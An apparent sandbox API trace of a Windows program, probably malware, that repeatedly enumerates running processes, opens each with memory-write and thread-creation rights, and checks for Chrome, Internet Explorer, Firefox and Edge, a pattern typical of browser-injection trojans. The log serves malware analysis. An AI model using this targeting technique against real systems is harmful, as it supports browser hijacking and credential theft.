	[0214.292] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.293] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4344
	[0214.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.294] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.294] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.295] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.295] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.295] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0214.296] CloseHandle (hObject=0x188) returned 1
	[0214.296] Sleep (dwMilliseconds=0x64) 
	[0214.392] GetCurrentProcessId () returned 0x110
	[0214.392] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0214.398] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0214.400] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0214.402] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0214.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4348
	[0214.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.405] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.405] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.406] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.406] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.406] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0214.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x434c
	[0214.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.407] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.407] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.408] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.408] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.408] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0214.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4350
	[0214.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.409] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0214.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.409] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.410] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0214.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.410] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.410] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0214.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4354
	[0214.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.411] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.412] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.412] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.412] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.412] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0214.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4358
	[0214.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.413] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0214.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.414] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.414] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0214.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.414] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.415] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0214.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x435c
	[0214.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.415] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0214.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.416] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.416] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0214.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.417] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.417] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0214.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4360
	[0214.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.418] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0214.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.418] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.418] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0214.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.419] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.419] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0214.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4364
	[0214.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.420] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0214.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.420] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.420] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0214.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.420] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.421] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4368
	[0214.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.421] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.422] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.422] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.422] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.423] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x436c
	[0214.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.424] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.424] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.424] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.425] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.425] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4370
	[0214.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.426] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.426] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.426] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.427] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.427] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4374
	[0214.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.428] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.428] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.428] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.429] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.429] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4378
	[0214.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.430] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.430] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.431] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.431] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.431] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x437c
	[0214.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.471] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.471] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.471] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.472] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.472] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4380
	[0214.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.473] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.473] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.474] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.474] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.474] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0214.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4384
	[0214.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.475] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0214.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.475] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.476] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0214.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.476] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.476] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4388
	[0214.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.477] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.477] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.478] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.478] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.478] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0214.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x438c
	[0214.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.479] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.479] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.480] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.480] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.480] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0214.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4390
	[0214.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.481] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0214.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.481] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.482] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0214.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.482] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.482] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4394
	[0214.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.483] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.483] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.484] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.484] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.484] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0214.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4398
	[0214.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.485] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0214.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.485] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.486] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0214.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.486] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.486] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0214.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x439c
	[0214.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.487] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0214.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.487] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.488] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0214.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.488] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.488] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0214.489] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x43a0
	[0214.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.489] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0214.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.489] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
